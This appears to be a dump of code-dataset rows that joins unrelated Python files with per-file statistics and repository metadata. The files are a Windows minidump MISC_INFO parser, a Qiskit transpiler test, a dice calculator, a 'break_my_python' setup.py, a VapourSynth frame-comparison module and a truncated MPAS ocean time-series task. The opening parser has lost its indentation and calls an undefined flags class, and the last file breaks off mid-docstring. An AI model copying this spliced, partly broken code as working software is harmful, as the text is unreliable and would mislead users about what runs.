class MinidumpMiscInfoFlags1(enum.IntFlag):
MINIDUMP_MISC1_PROCESS_ID = 0x00000001 #ProcessId is used.
MINIDUMP_MISC1_PROCESS_TIMES = 0x00000002 #ProcessCreateTime, ProcessKernelTime, and ProcessUserTime are used.
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
class MINIDUMP_MISC_INFO:
size = 24
def __init__(self):
self.SizeOfInfo = None
self.Flags1 = None
self.ProcessId = None
self.ProcessCreateTime = None
self.ProcessUserTime = None
self.ProcessKernelTime = None
def parse(buff):
mmi = MINIDUMP_MISC_INFO()
mmi.SizeOfInfo = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.Flags1 = MinidumpMiscInfoFlags1(int.from_bytes(buff.read(4), byteorder = 'little', signed = False))
if mmi.Flags1 & MinidumpMiscInfoFlags1.MINIDUMP_MISC1_PROCESS_ID:
mmi.ProcessId = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(4)
if mmi.Flags1 & MinidumpMiscInfoFlags1.MINIDUMP_MISC1_PROCESS_TIMES:
mmi.ProcessCreateTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessUserTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessKernelTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(12)
return mmi
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx
class MINIDUMP_MISC_INFO_2:
size = 44
def __init__(self):
self.SizeOfInfo = None
self.Flags1 = None
self.ProcessId = None
self.ProcessCreateTime = None
self.ProcessUserTime = None
self.ProcessKernelTime = None
self.ProcessorMaxMhz = None
self.ProcessorCurrentMhz = None
self.ProcessorMhzLimit = None
self.ProcessorMaxIdleState = None
self.ProcessorCurrentIdleState = None
def parse(buff):
mmi = MINIDUMP_MISC_INFO_2()
mmi.SizeOfInfo = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.Flags1 = MinidumpMiscInfo2Flags1(int.from_bytes(buff.read(4), byteorder = 'little', signed = False))
if mmi.Flags1 & MinidumpMiscInfo2Flags1.MINIDUMP_MISC1_PROCESS_ID:
mmi.ProcessId = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(4)
if mmi.Flags1 & MinidumpMiscInfo2Flags1.MINIDUMP_MISC1_PROCESS_TIMES:
mmi.ProcessCreateTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessUserTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessKernelTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(12)
if mmi.Flags1 & MinidumpMiscInfo2Flags1.MINIDUMP_MISC1_PROCESSOR_POWER_INFO:
mmi.ProcessorMaxMhz = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessorCurrentMhz = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessorMhzLimit = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessorMaxIdleState = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessorCurrentIdleState = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(20)
return mmi
class MinidumpMiscInfo:
def __init__(self):
self.ProcessId = None
self.ProcessCreateTime = None
self.ProcessUserTime = None
self.ProcessKernelTime = None
self.ProcessorMaxMhz = None
self.ProcessorCurrentMhz = None
self.ProcessorMhzLimit = None
self.ProcessorMaxIdleState = None
self.ProcessorCurrentIdleState = None
def parse(dir, buff):
t = MinidumpMiscInfo()
buff.seek(dir.Location.Rva)
chunk = io.BytesIO(buff.read(dir.Location.DataSize))
if dir.Location.DataSize == MINIDUMP_MISC_INFO.size:
misc = MINIDUMP_MISC_INFO.parse(chunk)
t.ProcessId = misc.ProcessId
t.ProcessCreateTime = misc.ProcessCreateTime
t.ProcessUserTime = misc.ProcessUserTime
t.ProcessKernelTime = misc.ProcessKernelTime
else:
misc = MINIDUMP_MISC_INFO_2.parse(chunk)
t.ProcessId = misc.ProcessId
t.ProcessCreateTime = misc.ProcessCreateTime
t.ProcessUserTime = misc.ProcessUserTime
t.ProcessKernelTime = misc.ProcessKernelTime
t.ProcessorMaxMhz = misc.ProcessorMaxMhz
t.ProcessorCurrentMhz = misc.ProcessorCurrentMhz
t.ProcessorMhzLimit = misc.ProcessorMhzLimit
t.ProcessorMaxIdleState = misc.ProcessorMaxIdleState
t.ProcessorCurrentIdleState = misc.ProcessorCurrentIdleState
return t
def __str__(self):
t = '== MinidumpMiscInfo ==\n'
t += 'ProcessId %s\n' % self.ProcessId
t += 'ProcessCreateTime %s\n' % self.ProcessCreateTime
t += 'ProcessUserTime %s\n' % self.ProcessUserTime
t += 'ProcessKernelTime %s\n' % self.ProcessKernelTime
t += 'ProcessorMaxMhz %s\n' % self.ProcessorMaxMhz
t += 'ProcessorCurrentMhz %s\n' % self.ProcessorCurrentMhz
t += 'ProcessorMhzLimit %s\n' % self.ProcessorMhzLimit
t += 'ProcessorMaxIdleState %s\n' % self.ProcessorMaxIdleState
t += 'ProcessorCurrentIdleState %s\n' % self.ProcessorCurrentIdleState
return t
| 42.074074
| 170
| 0.757394
| 5,257
| 0.925528
| 0
| 0
| 0
| 0
| 0
| 0
| 1,055
| 0.185739
|
0cec7a7b14ee446e6efc190805ad0c86fcf9567d
| 2,565
|
py
|
Python
|
test/python/transpiler/test_transpile.py
|
filemaster/qiskit-terra
|
8672c407a5a0e34405315f82d5ad5847916e857e
|
[
"Apache-2.0"
] | null | null | null |
test/python/transpiler/test_transpile.py
|
filemaster/qiskit-terra
|
8672c407a5a0e34405315f82d5ad5847916e857e
|
[
"Apache-2.0"
] | null | null | null |
test/python/transpiler/test_transpile.py
|
filemaster/qiskit-terra
|
8672c407a5a0e34405315f82d5ad5847916e857e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=redefined-builtin
"""Tests basic functionality of the transpile function"""
from qiskit import QuantumRegister, QuantumCircuit
from qiskit import compile, BasicAer
from qiskit.transpiler import PassManager, transpile_dag, transpile
from qiskit.tools.compiler import circuits_to_qobj
from qiskit.converters import circuit_to_dag
from ..common import QiskitTestCase
class TestTranspile(QiskitTestCase):
"""Test transpile function."""
def test_pass_manager_empty(self):
"""Test passing an empty PassManager() to the transpiler.
It should perform no transformations on the circuit.
"""
qr = QuantumRegister(2)
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
dag_circuit = circuit_to_dag(circuit)
resources_before = dag_circuit.count_ops()
pass_manager = PassManager()
dag_circuit = transpile_dag(dag_circuit, pass_manager=pass_manager)
resources_after = dag_circuit.count_ops()
self.assertDictEqual(resources_before, resources_after)
def test_pass_manager_none(self):
"""Test passing the default (None) pass manager to the transpiler.
It should perform the default qiskit flow:
unroll, swap_mapper, cx_direction, cx_cancellation, optimize_1q_gates
and should be equivalent to using tools.compile
"""
qr = QuantumRegister(2, 'qr')
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
coupling_map = [[1, 0]]
basis_gates = 'u1,u2,u3,cx,id'
backend = BasicAer.get_backend('qasm_simulator')
circuit2 = transpile(circuit, backend, coupling_map=coupling_map, basis_gates=basis_gates,
pass_manager=None)
qobj = compile(circuit, backend=backend, coupling_map=coupling_map, basis_gates=basis_gates)
qobj2 = circuits_to_qobj(circuit2, backend.name(), basis_gates=basis_gates,
coupling_map=coupling_map, qobj_id=qobj.qobj_id)
self.assertEqual(qobj, qobj2)
| 34.2
| 100
| 0.665107
| 1,982
| 0.77271
| 0
| 0
| 0
| 0
| 0
| 0
| 741
| 0.288889
|
0cee3a5d83fc06ee8d80703cbf5bab61011eb8f9
| 7,039
|
py
|
Python
|
repiko/module/calculator.py
|
liggest/RepiKoBot
|
5a2aa511e747785ad341c60d809af2a2788963ab
|
[
"MIT"
] | 1
|
2021-07-29T13:23:58.000Z
|
2021-07-29T13:23:58.000Z
|
repiko/module/calculator.py
|
liggest/RepiKoBot
|
5a2aa511e747785ad341c60d809af2a2788963ab
|
[
"MIT"
] | null | null | null |
repiko/module/calculator.py
|
liggest/RepiKoBot
|
5a2aa511e747785ad341c60d809af2a2788963ab
|
[
"MIT"
] | null | null | null |
import random
class Calculator():
symbol=["+","-","*","/","(",")"]
def __init__(self):
pass
def cal(self,s):
if self.isnumber(s[0]):
return s
elif s[0]=="error":
return ["error",s[1]]
elif "(" in s[0] or ")" in s[0]: #or "^" in s[0]:
el=self.analyze(s)
e=el[0]
log=el[1]
return self.cal([e,log])
else:
e=s[0]
log=s[1]
if "-" in e:
ex=e
for x in range(len(e)):
if e[x]=="-":
if x==0:
ex="–"+ex[1:]
elif e[x-1] in self.symbol:
ex=ex[:x]+"–"+ex[x+1:]
e=ex
if "*" in e or "/" in e:
length=len(e)
lastMark=-1
thisMark=0
nextMark=length
mark="*"
for x in range(length):
if e[x]=="*" or e[x]=="/":
thisMark=x
mark=e[x]
for y in range(thisMark+1,length):
if e[y] in self.symbol:
nextMark=y
break
for y in range(thisMark-1,-1,-1):
if e[y] in self.symbol:
lastMark=y
break
target_l=e[lastMark+1:thisMark].replace("–","-")
target_r=e[thisMark+1:nextMark].replace("–","-")
if not self.isnumber(target_l):
target=self.cal([target_l,log])
target_l=target[0]
log=target[1]
if not self.isnumber(target_r):
target=self.cal([target_r,log])
target_r=target[0]
log=target[1]
if target_r=="error" or target_l=="error":
return ["error",log]
if mark=="*":
result_temp=str(float(target_l)*float(target_r))
elif mark=="/" and target_r!="0":
result_temp=str(float(target_l)/float(target_r))
else:
return ["error",log]
e=e[:lastMark+1]+result_temp+e[nextMark:]
log=log+e+"\n"
break
elif "+" in e or "-" in e:
length=len(e)
lastMark=-1
thisMark=0
nextMark=length
mark="+"
for x in range(length):
if e[x]=="+" or e[x]=="-":
thisMark=x
mark=e[x]
for y in range(thisMark+1,length):
if e[y] in self.symbol:
nextMark=y
break
for y in range(thisMark-1,-1,-1):
if e[y] in self.symbol:
lastMark=y
break
target_l=e[lastMark+1:thisMark].replace("–","-")
target_r=e[thisMark+1:nextMark].replace("–","-")
if not self.isnumber(target_l):
target=self.cal([target_l,log])
target_l=target[0]
log=target[1]
if not self.isnumber(target_r):
target=self.cal([target_r,log])
target_r=target[0]
log=target[1]
if target_r=="error" or target_l=="error":
return ["error",log]
if mark=="+":
result_temp=str(float(target_l)+float(target_r))
elif mark=="-":
result_temp=str(float(target_l)-float(target_r))
else:
return ["error",log]
e=e[:lastMark+1]+result_temp+e[nextMark:]
log=log+e+"\n"
break
else:
return ["error",log]
return self.cal([e,log])
def analyze(self,s):
e=s[0]
log=s[1]
while "(" in e or ")" in e:
bracketL=0
bracketR=0
length=len(e)
for x in range(length-1,-1,-1):
if e[x]=="(":
bracketL=x
bracketR=e[x:].find(")")+x
break
rs=e[bracketL+1:bracketR]
log=log+rs+"\n"
result_temp=self.cal([rs,log])
if result_temp[0]=="error":
return ["error",result_temp[1]]
e=e[:bracketL]+result_temp[0]+e[bracketR+1:]
log=result_temp[1]+e+"\n"
return [e,log]
def isnumber(self,s):
try :
float(s)
return True
except:
return False
def dice(self,s):
e=s
while "d" in e:
length=len(e)
dn=e.find("d")
start=-1
end=length
for x in range(dn+1,length):
if not e[x].isdecimal():
end=x
break
for y in range(dn-1,-1,-1):
if not e[y].isdecimal():
start=y
break
startn=e[start+1:dn]
endn=e[dn+1:end]
if startn=="":
startn=1
else:
startn=abs(int(startn))
if endn=="":
endn=100
else:
endn=abs(int(endn))
if endn!=0 and startn<=100 and startn!=0:
result_temp="("
for z in range(startn):
result_temp+=str(random.randint(1,endn))
if z!=startn-1:
result_temp+="+"
result_temp+=")"
elif endn==0:
return "-丢了个卵子"
elif startn>100:
return "-丢了一群卵子"
elif startn==0:
return "-丢不出卵子,只能丢人了"
e=e[:start+1]+result_temp+e[end:]
return e
def dicetext(self,s,act):
text=self.dice(s)
if text[0:2]=="-丢":
return text[1:]
num=self.cal([text,text+"\n"])
if num[0]!="error":
return "投掷 "+act+" :"+s+" = "+text+" = "+num[0]
else:
return "呜…投个骰子都卡住了……"
#x=Calculator()
#a=input()
#r=x.cal([a,a+"\n"])
#print(r[1][:-1])
#if r[0]=="error":
# print("error")
#print(x.dicetext(a,""))
| 36.661458
| 76
| 0.356016
| 6,980
| 0.979649
| 0
| 0
| 0
| 0
| 0
| 0
| 547
| 0.076772
|
0cf0a226855cb91425b2c33151d95bfc025b95b0
| 624
|
py
|
Python
|
tests/retrieve/test_segment.py
|
openghg/openghg
|
9a05dd6fe3cee6123898b8f390cfaded08dbb408
|
[
"Apache-2.0"
] | 5
|
2021-03-02T09:04:07.000Z
|
2022-01-25T09:58:16.000Z
|
tests/retrieve/test_segment.py
|
openghg/openghg
|
9a05dd6fe3cee6123898b8f390cfaded08dbb408
|
[
"Apache-2.0"
] | 229
|
2020-09-30T15:08:39.000Z
|
2022-03-31T14:23:55.000Z
|
tests/retrieve/test_segment.py
|
openghg/openghg
|
9a05dd6fe3cee6123898b8f390cfaded08dbb408
|
[
"Apache-2.0"
] | null | null | null |
# import os
# import uuid
# import numpy as np
# import pandas as pd
# import pytest
# mocked_uuid = "00000000-0000-1111-00000-000000000000"
# @pytest.fixture(scope="session")
# def data():
# filename = "bsd.picarro.1minute.248m.dat"
# dir_path = os.path.dirname(__file__)
# test_data = "../data/proc_test_data/CRDS"
# filepath = os.path.join(dir_path, test_data, filename)
# return pd.read_csv(filepath, header=None, skiprows=1, sep=r"\s+")
# @pytest.fixture
# def mock_uuid(monkeypatch):
# def mock_uuid():
# return mocked_uuid
# monkeypatch.setattr(uuid, "uuid4", mock_uuid)
| 21.517241
| 71
| 0.674679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 596
| 0.955128
|
0cf19d7af68dc81b523b12d529be9b1094af28ac
| 891
|
py
|
Python
|
setup.py
|
jjhelmus/break_my_python
|
4f8165fa3ae2bbe72b21f49156598387ee18b94a
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
jjhelmus/break_my_python
|
4f8165fa3ae2bbe72b21f49156598387ee18b94a
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
jjhelmus/break_my_python
|
4f8165fa3ae2bbe72b21f49156598387ee18b94a
|
[
"BSD-3-Clause"
] | null | null | null |
from setuptools import setup
with open('README.md') as f:
long_description = f.read()
setup(
name='break_my_python',
version='0.0.2',
description='This package tries to breaks your python interpreter, do not install it',
long_description=long_description,
author='Jonathan J. Helmus',
author_email='jjhelmus@gmail.com',
url='http://pypi.python.org/pypi/break_my_python/',
license='LICENSE.txt',
py_modules=['break_my_python'],
data_files=[('/', ['break_my_python.pth'])],
classifiers=[
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
]
)
| 31.821429
| 90
| 0.655443
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 547
| 0.613917
|
0cf1bfd01d728cb0a54ff17ffb5bf2c3afbfaf92
| 12,039
|
py
|
Python
|
n4ofunc/comp.py
|
noaione/n4ofunc
|
81a69de67284f9685d1f88cb34f7d3d2d0ce19c1
|
[
"MIT"
] | 4
|
2018-05-28T05:05:01.000Z
|
2020-03-24T15:01:24.000Z
|
n4ofunc/comp.py
|
noaione/n4ofunc
|
81a69de67284f9685d1f88cb34f7d3d2d0ce19c1
|
[
"MIT"
] | null | null | null |
n4ofunc/comp.py
|
noaione/n4ofunc
|
81a69de67284f9685d1f88cb34f7d3d2d0ce19c1
|
[
"MIT"
] | null | null | null |
"""
MIT License
Copyright (c) 2020-present noaione
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import shutil
import sys
from functools import partial
from pathlib import Path
from typing import Dict, Generator, List, NamedTuple, NoReturn, Optional, Tuple
import vapoursynth as vs
from vsutil import get_w, get_y
from .utils import has_plugin_or_raise
__all__ = (
"check_difference",
"save_difference",
"stack_compare",
"interleave_compare",
"compare",
)
core = vs.core
class FrameDiff(NamedTuple):
frame: vs.VideoNode
number: int
difference: float
def _pad_video_length(clip_a: vs.VideoNode, clip_b: vs.VideoNode) -> Tuple[vs.VideoNode, vs.VideoNode]:
clip_a_length = clip_a.num_frames
clip_b_length = clip_b.num_frames
if clip_a_length == clip_b_length:
return clip_a, clip_b
elif clip_a_length > clip_b_length:
src_add = clip_a_length - clip_b_length
clip_b = clip_b + (clip_b[-1] * src_add)
elif clip_b_length > clip_a_length:
src_add = clip_b_length - clip_a_length
clip_a = clip_a + (clip_a[-1] * src_add)
return clip_a, clip_b
def _preprocess_clips(clip_a: vs.VideoNode, clip_b: vs.VideoNode) -> Tuple[vs.VideoNode, vs.VideoNode]:
if not isinstance(clip_a, vs.VideoNode):
raise TypeError("clip_a must be a clip")
if not isinstance(clip_b, vs.VideoNode):
raise TypeError("clip_b must be a clip")
has_plugin_or_raise("fmtc")
clipa_cf = clip_a.format.color_family
clipb_cf = clip_b.format.color_family
clipa_bits = clip_a.format.bits_per_sample
clipb_bits = clip_b.format.bits_per_sample
clip_a, clip_b = _pad_video_length(clip_a, clip_b)
if clipa_cf != vs.RGB:
clip_a = clip_a.resize.Point(format=vs.RGBS, matrix_in_s="709")
if clipb_cf != vs.RGB:
clip_b = clip_b.resize.Point(format=vs.RGBS, matrix_in_s="709")
if clipa_bits != 8:
clip_a = clip_a.fmtc.bitdepth(bits=8)
if clipb_bits != 8:
clip_b = clip_b.fmtc.bitdepth(bits=8)
return clip_a, clip_b
def _frame_yielder(
clip_a: vs.VideoNode, clip_b: vs.VideoNode, threshold: float = 0.1
) -> Generator[Tuple[int, vs.RawFrame], None, None]:
clip_a_gray = clip_a.std.ShufflePlanes(0, vs.GRAY)
clip_b_gray = clip_b.std.ShufflePlanes(0, vs.GRAY)
frame: vs.RawFrame
for num, frame in enumerate(core.std.PlaneStats(clip_a_gray, clip_b_gray).frames()): # type: ignore
if frame.props["PlaneStatsDiff"] >= threshold: # type: ignore
yield num, frame
def check_difference(
clip_a: vs.VideoNode,
clip_b: vs.VideoNode,
threshold: float = 0.1,
) -> NoReturn:
if not hasattr(sys, "argv"): # Simple check if script are opened via VSEdit
raise Exception(
"check_difference: please run this vpy script via command-line (ex: python3 ./script.vpy)"
)
clip_a, clip_b = _preprocess_clips(clip_a, clip_b)
last_known_diff = -1
known_diff = 0
try:
for num, _ in _frame_yielder(clip_a, clip_b, threshold):
if last_known_diff != num:
print(f"check_difference: Frame {num} is different")
known_diff += 1
last_known_diff = num + 1
except KeyboardInterrupt:
print("check_difference: Process interrupted")
exit(1)
if known_diff == 0:
print(f"check_difference: No difference found (threshold: {threshold})")
exit(0)
def save_difference(
clip_a: vs.VideoNode,
clip_b: vs.VideoNode,
threshold: float = 0.1,
output_filename: List[str] = ["src1", "src2"],
) -> NoReturn:
if not hasattr(sys, "argv"): # Simple check if script are opened via VSEdit
raise Exception(
"save_difference: please run this vpy script via command-line (ex: python3 ./script.vpy)"
)
if len(output_filename) != 2:
raise Exception("save_difference: output_filename must be a tuple of two strings")
has_plugin_or_raise("imwri")
clip_a, clip_b = _preprocess_clips(clip_a, clip_b)
fn_a, fn_b = output_filename
# Get current directory of the file
filename = Path(sys.argv[0]).resolve()
current_dir = filename.parent
only_fn = filename.name.split(".", 1)[0]
target_dir = current_dir / f"{only_fn}_frame_difference"
target_dir.mkdir(exist_ok=True)
differences_data: Dict[str, FrameDiff] = {}
known_diff = 0
last_known_diff = -1
try:
for num, frame in _frame_yielder(clip_a, clip_b, threshold):
if last_known_diff != num:
differences_data[f"{known_diff}_{fn_a}"] = FrameDiff(
frame=clip_a[num],
number=num,
difference=frame.props["PlaneStatsDiff"], # type: ignore
)
differences_data[f"{known_diff}_{fn_b}"] = FrameDiff(
frame=clip_b[num],
number=num,
difference=frame.props["PlaneStatsDiff"], # type: ignore
)
known_diff += 1
last_known_diff = num + 1
except KeyboardInterrupt:
print("save_difference: Process interrupted")
exit(1)
if known_diff == 0:
print(f"check_difference: No difference found (threshold: {threshold})")
shutil.rmtree(str(target_dir))
exit(0)
print(f"save_difference: {known_diff} differences found, saving images...")
try:
for filename, frame_info in differences_data.items():
print(f"save_difference: saving frame: {frame_info.number} ({frame_info.difference})")
actual_target = target_dir / f"{filename} (%05d).png"
out: vs.VideoNode = core.imwri.Write(
frame_info.frame, imgformat="PNG", filename=str(actual_target), firstnum=frame_info.number
)
out.get_frame(0)
except KeyboardInterrupt:
print("save_difference: Process interrupted")
exit(1)
exit(0)
def stack_compare(
clips: List[vs.VideoNode],
height: Optional[int] = None,
identity: bool = False,
max_vertical_stack: int = 2,
interleave_only: bool = False,
):
"""
Stack/interleave compare multiple clips.
Probably inspired by LightArrowsEXE ``stack_compare`` function.
Clips are stacked like this:
-------------
| A | C | E |
-------------
| B | D | F |
------------- -- (For max_vertical_stack = 2)
etc...
If clips total are missing some, it'll add an extra BlankClip.
Formula: `multiples_of_max_vertical_stack[i] <= clip_total <= multiples_of_max_vertical_stack[i + 1]`
If one of the clips only have `Y` plane, all other clips will be changed to use only 1 plane
The total vertical clips can be modified using `max_vertical_stack`
Parameters
----------
clips: :class:`List[VideoNode]`
A collection of clips or sources to compare.
height: :class:`Optional[int]`
Resize the stacked compare into a new height.
If ``interleave_only`` is ``True``, this will be ignored.
identity: :class:`bool`
If ``True``, there will be numbering to identify each clips.
If ``interleave_only`` is ``True``, this will be ignored.
max_vertical_stack: :class:`int`
The maximum number of clips to stack vertically.
If ``interleave_only`` is ``True``, this will be ignored.
interleave_only: :class:`bool`
If ``True``, the output will be an interleaved comparision.
Returns
-------
:class:`VideoNode`
A stacked/interleaved compare of the clips.
"""
the_string = "ABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcefghijklmnopqrstuvwxyz"
if len(clips) < 2:
raise ValueError("stack_compare: please provide 2 or more clips.")
has_plugin_or_raise("sub")
def _fallback_str(num: int) -> str:
try:
return the_string[num]
except IndexError:
return f"Extra{num + 1}"
def _generate_ident(clip_index: int, src_w: int, src_h: int) -> str:
gen = r"{\an7\b1\bord5\c&H00FFFF\pos"
gen += "({w}, {h})".format(w=25 * (src_w / 1920), h=25 * (src_h / 1080))
gen += r"\fs" + "{0}".format(60 * (src_h / 1080)) + r"}"
gen += "Clip {0}".format(_fallback_str(clip_index))
return gen
# Check for luma only clip
only_use_luma = False
for clip in clips:
if clip.format.num_planes == 1:
only_use_luma = True
break
if interleave_only:
if only_use_luma:
clips = [get_y(clip) for clip in clips]
# Set identity
if identity:
clips = [
clip.sub.Subtitle(
_generate_ident(
idx,
clip.width,
clip.height,
)
)
for idx, clip in enumerate(clips)
]
return core.std.Interleave(clips, mismatch=True)
def _calculate_needed_clip(max_vert: int, clip_total: int) -> int:
multiples_of = list(range(max_vert, (clip_total + 1) * max_vert, max_vert))
multiples_of_total = len(multiples_of)
max_needed = 1
for i in range(multiples_of_total):
if i + 1 == multiples_of_total - 1:
break
if multiples_of[i] <= clip_total <= multiples_of[i + 1]:
max_needed = multiples_of[i + 1]
break
return max_needed
# Set YUV video to Y video if only_use_luma.
if only_use_luma:
clips = [get_y(clip) for clip in clips]
if identity:
clips = [
clip.sub.Subtitle(_generate_ident(ind, clip.width, clip.height)) for ind, clip in enumerate(clips)
]
# Find needed clip for current `max_vertical_stack`.
if len(clips) != max_vertical_stack:
needed_clip = _calculate_needed_clip(max_vertical_stack, len(clips))
f_clip = clips[0]
for _ in range(needed_clip - len(clips)):
clips.append(
core.std.BlankClip(f_clip).sub.Subtitle(
r"{\an5\fs120\b1\pos("
+ "{},{}".format(f_clip.width / 2, f_clip.height / 2)
+ r")}BlankClip Pad\N(Ignore)"
)
)
# Split into chunks of `max_vertical_stack` and StackVertical it.
# Input: [A, B, C, D, E, F, G, H]
# Output: [[A, B], [C, D], [E, F], [G, H]]
clips = [
core.std.StackVertical(clips[i : i + max_vertical_stack])
for i in range(0, len(clips), max_vertical_stack)
]
final_clip = core.std.StackHorizontal(clips) if len(clips) > 1 else clips[0]
if height:
if height != final_clip.height:
ar = final_clip.width / final_clip.height
final_clip = final_clip.resize.Bicubic(
get_w(height, ar),
height,
)
return final_clip
interleave_compare = partial(stack_compare, interleave_only=True)
compare = stack_compare
| 35.201754
| 110
| 0.631614
| 90
| 0.007476
| 482
| 0.040037
| 0
| 0
| 0
| 0
| 4,237
| 0.35194
|
0cf20d68ff93bb50029ab4621417fc5c929819f7
| 11,612
|
py
|
Python
|
mpas_analysis/ocean/time_series_sst.py
|
alicebarthel/MPAS-Analysis
|
a8c568180abf96879e890a73e848db58642cfdb6
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
mpas_analysis/ocean/time_series_sst.py
|
alicebarthel/MPAS-Analysis
|
a8c568180abf96879e890a73e848db58642cfdb6
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
mpas_analysis/ocean/time_series_sst.py
|
alicebarthel/MPAS-Analysis
|
a8c568180abf96879e890a73e848db58642cfdb6
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# This software is open source software available under the BSD-3 license.
#
# Copyright (c) 2020 Triad National Security, LLC. All rights reserved.
# Copyright (c) 2020 Lawrence Livermore National Security, LLC. All rights
# reserved.
# Copyright (c) 2020 UT-Battelle, LLC. All rights reserved.
#
# Additional copyright and license information can be found in the LICENSE file
# distributed with this code, or at
# https://raw.githubusercontent.com/MPAS-Dev/MPAS-Analysis/master/LICENSE
from __future__ import absolute_import, division, print_function, \
unicode_literals
from mpas_analysis.shared import AnalysisTask
from mpas_analysis.shared.plot import timeseries_analysis_plot, savefig
from mpas_analysis.shared.time_series import combine_time_series_with_ncrcat
from mpas_analysis.shared.io import open_mpas_dataset
from mpas_analysis.shared.timekeeping.utility import date_to_days, \
days_to_datetime
from mpas_analysis.shared.io.utility import build_config_full_path, \
make_directories, check_path_exists
from mpas_analysis.shared.html import write_image_xml
class TimeSeriesSST(AnalysisTask):
"""
Performs analysis of the time-series output of sea-surface temperature
(SST).
Attributes
----------
mpasTimeSeriesTask : ``MpasTimeSeriesTask``
The task that extracts the time series from MPAS monthly output
controlConfig : ``MpasAnalysisConfigParser``
Configuration options for a control run (if any)
"""
# Authors
# -------
# Xylar Asay-Davis, Milena Veneziani
def __init__(self, config, mpasTimeSeriesTask, controlConfig=None):
# {{{
"""
Construct the analysis task.
Parameters
----------
config : ``MpasAnalysisConfigParser``
Configuration options
mpasTimeSeriesTask : ``MpasTimeSeriesTask``
The task that extracts the time series from MPAS monthly output
controlConfig : ``MpasAnalysisConfigParser``, optional
Configuration options for a control run (if any)
"""
# Authors
# -------
# Xylar Asay-Davis
# first, call the constructor from the base class (AnalysisTask)
super(TimeSeriesSST, self).__init__(
config=config,
taskName='timeSeriesSST',
componentName='ocean',
tags=['timeSeries', 'sst', 'publicObs'])
self.mpasTimeSeriesTask = mpasTimeSeriesTask
self.controlConfig = controlConfig
self.run_after(mpasTimeSeriesTask)
# }}}
def setup_and_check(self): # {{{
"""
Perform steps to set up the analysis and check for errors in the setup.
Raises
------
OSError
If files are not present
"""
# Authors
# -------
# Xylar Asay-Davis
# first, call setup_and_check from the base class (AnalysisTask),
# which will perform some common setup, including storing:
# self.inDirectory, self.plotsDirectory, self.namelist, self.streams
# self.calendar
super(TimeSeriesSST, self).setup_and_check()
config = self.config
self.startDate = self.config.get('timeSeries', 'startDate')
self.endDate = self.config.get('timeSeries', 'endDate')
self.variableList = \
['timeMonthly_avg_avgValueWithinOceanRegion_avgSurfaceTemperature']
self.mpasTimeSeriesTask.add_variables(variableList=self.variableList)
if config.get('runs', 'preprocessedReferenceRunName') != 'None':
check_path_exists(config.get('oceanPreprocessedReference',
'baseDirectory'))
self.inputFile = self.mpasTimeSeriesTask.outputFile
mainRunName = config.get('runs', 'mainRunName')
regions = config.getExpression('timeSeriesSST', 'regions')
self.xmlFileNames = []
self.filePrefixes = {}
for region in regions:
filePrefix = 'sst_{}_{}'.format(region, mainRunName)
self.xmlFileNames.append('{}/{}.xml'.format(self.plotsDirectory,
filePrefix))
self.filePrefixes[region] = filePrefix
return # }}}
def run_task(self): # {{{
"""
